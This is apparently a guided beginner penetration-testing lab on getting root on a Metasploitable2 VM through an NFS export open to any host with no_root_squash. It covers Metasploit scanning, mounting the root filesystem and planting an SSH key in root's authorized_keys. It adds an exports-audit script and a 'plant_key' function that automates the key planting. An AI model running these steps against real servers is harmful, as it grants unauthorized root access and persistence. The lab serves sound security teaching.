Exploiting NFS Misconfiguration to Gain Root Access with Nmap


Introduction

Network File System (NFS) is a distributed file system protocol that allows users to access remote files as if they were local. However, improper configuration of NFS can lead to severe security vulnerabilities, allowing attackers to gain unauthorized access to the system. In this lab, you will learn how to exploit NFS misconfiguration to gain root access to a target machine.

The goal of this lab is to understand the risks associated with NFS misconfiguration and learn how to perform a successful NFS-based attack. By the end of the lab, you will have gained hands-on experience in identifying NFS shares, mounting them locally, and leveraging the misconfiguration to obtain root privileges on the target system.

This is a Guided Lab that provides step-by-step instructions to help you learn and practise. Follow the instructions carefully to complete each step and gain hands-on experience. According to historical data, this is a beginner-level lab with an 88% completion rate, and it has received an 83% positive rating from learners.

Scanning for NFS Shares

In this step, you will use the Metasploit Framework to scan the target machine for NFS shares.

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2

Wait for the target machine to boot; this can take 1 to 3 minutes.

  2. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter a bash shell in it by running:
docker run -ti --network host --privileged b5b709a49cd5 bash

The extra --privileged parameter gives root inside the container real root capabilities on the host. Without it, Docker drops capabilities such as CAP_SYS_ADMIN and its default seccomp profile blocks the mount system call, so root in the container would be unable to mount the NFS export in the next step. A privileged container also sees most of the host's devices and can even run Docker inside Docker, which is why this flag belongs in a lab and nowhere else.

  4. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration test.

  5. Launch the Metasploit console:
cd ~
msfconsole

  6. In the Metasploit console, use the auxiliary/scanner/nfs/nfsmount module to scan for NFS shares:
use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.122.102
set threads 5
show options
exploit

This module queries the target's mountd and lists every exported directory together with the client pattern allowed to mount it. For Metasploitable2 you should see the root directory / exported to * (any host).

Press Ctrl+D to quit the Metasploit console, then continue to the next step.
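The nfsmount module (like showmount -e) only reports the export path and the client pattern, e.g. / * for Metasploitable2; whether the server squashes remote root to the anonymous user is visible only in /etc/exports on the server itself. The following script is an added example, not part of the LabEx lab, that audits /etc/exports lines for exactly the conditions this lab relies on: an export open to any host, writable, and with no_root_squash. The sample file is constructed; its first line reproduces Metasploitable2's export, the other two are restricted forms for comparison.

```shell
#!/bin/sh
# Added example, not part of the lab: audit /etc/exports for the
# misconfiguration exploited here. An exports line looks like
#   <path> <client>(<opts>) [<client>(<opts>) ...]
# export_flags prints "<path> <flags>" (flags comma-separated, or "ok") and
# returns 1 when any host may mount the export ('*' or no client spec) or
# when remote root keeps uid 0 (no_root_squash); 0 otherwise.
export_flags() {
    line=${1%%#*}                       # drop trailing comment
    set -f; set -- $line; set +f        # split on whitespace without globbing '*'
    [ $# -eq 0 ] && return 0            # blank or comment-only line
    path=$1; shift
    flags=""; bad=0
    [ $# -eq 0 ] && { flags="any-host"; bad=1; }   # no client list at all
    for spec in "$@"; do
        client=${spec%%"("*}
        case $spec in
            *"("*")") opts=${spec#*"("}; opts=${opts%")"} ;;
            *)        opts="" ;;
        esac
        case $client in
            ''|'*') flags="${flags:+$flags,}any-host"; bad=1 ;;
        esac
        case ",$opts," in *,rw,*) flags="${flags:+$flags,}rw" ;; esac
        case ",$opts," in *,no_root_squash,*) flags="${flags:+$flags,}no_root_squash"; bad=1 ;; esac
    done
    [ "$path" = "/" ] && flags="${flags:+$flags,}root-fs"   # whole filesystem exported
    printf '%s %s\n' "$path" "${flags:-ok}"
    return $bad
}

# audit_exports FILE: one report line per export; returns the number of
# dangerous exports (0 = clean).
audit_exports() {
    n=0
    while IFS= read -r l || [ -n "$l" ]; do
        export_flags "$l" || n=$((n + 1))
    done < "$1"
    return $n
}

# Constructed sample. Line 1 is Metasploitable2's export (the lab's target);
# lines 2-3 show restricted forms for comparison.
sample=$(mktemp)
cat > "$sample" <<'EOF'
/ *(rw,sync,no_root_squash,no_subtree_check)
/srv/share 192.168.122.0/24(ro,sync,root_squash,no_subtree_check)
/home/backup 10.0.0.5(rw,sync)   # root_squash is the default when not listed
EOF
dangerous=0
audit_exports "$sample" || dangerous=$?
echo "dangerous exports: $dangerous"
rm -f "$sample"
```

On a server you would run audit_exports /etc/exports; a non-zero return value means at least one export is mountable by anyone or honours a remote root. The fix for the lab's target is the second sample line: restrict the client list to a subnet, export read-only where possible, and leave root squashing on.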

Mounting the NFS Share

In this step, you will mount the target's NFS root export inside the Kali container.

First, install the nfs-common package:

cd /
apt-get install -y nfs-common

Mount the NFS root export:

mount -t nfs -o nolock 192.168.122.102:/ /mnt

This mounts the target's root directory (/) on /mnt in the Kali container. The -o nolock option disables NFS file locking so the mount works without a lock daemon (rpc.statd) running in the container. The misconfiguration being exploited is that Metasploitable2 exports / to every host (*) with the rw and no_root_squash options: because remote root is not mapped to the anonymous user, root in the container is treated as root on the server and can read and write any file on the export, including files under /root.

Verify that the share is mounted by listing /mnt:

ls /mnt

You should see the contents of the target's root filesystem.

Creating an SSH Key Pair

In this step, you will create an SSH key pair so that you can log in to the target over SSH without a password.

Generate the key pair (ssh-keygen does not create the parent directory when -f is given, so create /root/.ssh first if it does not exist yet):

mkdir -p /root/.ssh
ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsa

Press Enter at the passphrase prompts; a passphrase would defeat the passwordless login in the last step. This creates two files: /root/.ssh/id_rsa (the private key) and /root/.ssh/id_rsa.pub (the public key).

Enabling Passwordless SSH Access

In this step, you will append your public key to root's authorized_keys file on the target, which enables passwordless SSH access.

Append the public key to the target's authorized_keys file:

cat /root/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys

This appends the contents of your public key file to /root/.ssh/authorized_keys on the target. Because the export uses no_root_squash, the write happens as root on the target and the file keeps root ownership, so sshd will accept it. If /mnt/root/.ssh does not exist, create it first with mkdir -p /mnt/root/.ssh and chmod 700 /mnt/root/.ssh; sshd ignores keys in a directory that is writable by other users.

Gaining Root Access

In this step, you will log in to the target as root over SSH using the key you just planted.

Connect to the target over SSH:

ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss root@192.168.122.102

You should now have a root shell on the target without entering a password. The HostKeyAlgorithms option is needed because Metasploitable2 runs an old OpenSSH (4.7) that only offers ssh-rsa and ssh-dss host keys, which recent clients reject by default. If you are still prompted for a password, an OpenSSH 8.8 or newer client is most likely also refusing to sign with the SHA-1 based ssh-rsa scheme for your user key; add -o PubkeyAcceptedAlgorithms=+ssh-rsa to the command.
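The key-planting step of this lab, written as an idempotent shell function. This is an added example, not code from the lab: it creates root's .ssh directory if it is missing, sets the permissions sshd insists on (700 on the directory, 600 on the file), and appends the key only if it is not already there, so running it twice does not duplicate entries. The driver at the bottom runs it against a temporary directory standing in for the mounted export, with a placeholder key (constructed data, not the real target); in the lab you would call plant_key /mnt /root/.ssh/id_rsa.pub after the mount step.

```shell
#!/bin/sh
# Added example, not part of the lab: plant an SSH public key for root on an
# NFS-mounted root filesystem. This only works because the export uses
# no_root_squash, so our uid 0 is honoured and files created under
# $MNT/root are owned by the target's root. sshd ignores authorized_keys
# when ~/.ssh or the file is writable by others, so permissions are set
# explicitly.
#
# plant_key MNT PUBKEY_FILE -> prints "key added" or "key already present";
# returns 2 if the public key file is unreadable.
plant_key() {
    mnt=$1; pubkey=$2
    sshdir="$mnt/root/.ssh"
    authkeys="$sshdir/authorized_keys"
    [ -r "$pubkey" ] || { echo "cannot read $pubkey" >&2; return 2; }
    key=$(cat "$pubkey")
    mkdir -p "$sshdir" && chmod 700 "$sshdir"
    [ -f "$authkeys" ] || : > "$authkeys"
    chmod 600 "$authkeys"
    if grep -qxF -- "$key" "$authkeys"; then      # exact full-line match
        echo "key already present"
        return 0
    fi
    printf '%s\n' "$key" >> "$authkeys"
    echo "key added"
}

# count_keys MNT -> number of lines in root's authorized_keys (0 if absent)
count_keys() {
    f="$1/root/.ssh/authorized_keys"
    [ -f "$f" ] || { echo 0; return 0; }
    wc -l < "$f" | tr -d ' '
}

# Driver on a constructed stand-in for the mounted export; the key below is
# a placeholder, not a real key.
fake=$(mktemp -d)
mkdir -p "$fake/root"
printf 'ssh-rsa AAAAEXAMPLEKEYONLY root@kali\n' > "$fake/id_rsa.pub"
plant_key "$fake" "$fake/id_rsa.pub"      # first run: key added
plant_key "$fake" "$fake/id_rsa.pub"      # second run: key already present
echo "keys now in authorized_keys: $(count_keys "$fake")"
rm -rf "$fake"
```

The exact-line grep is what makes the function safe to re-run; the original cat >> command appends a duplicate every time. Note that files written this way carry the timestamps and ownership of a root login on the target, which is also what a defender auditing /root/.ssh/authorized_keys would look for.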

Summary

In this lab, you learned how to exploit an NFS misconfiguration to gain unauthorized root access to a target system. You first scanned for NFS shares with the Metasploit Framework, then mounted the NFS root export on your local machine. Next, you created an SSH key pair and appended the public key to root's authorized_keys file on the target, enabling passwordless SSH access. Finally, you used that access to log in to the target as root.

This lab demonstrates why NFS exports must be configured carefully: exporting a filesystem to any host with no_root_squash hands remote root full control of it. Understanding this weakness helps you protect your own systems against the same attack.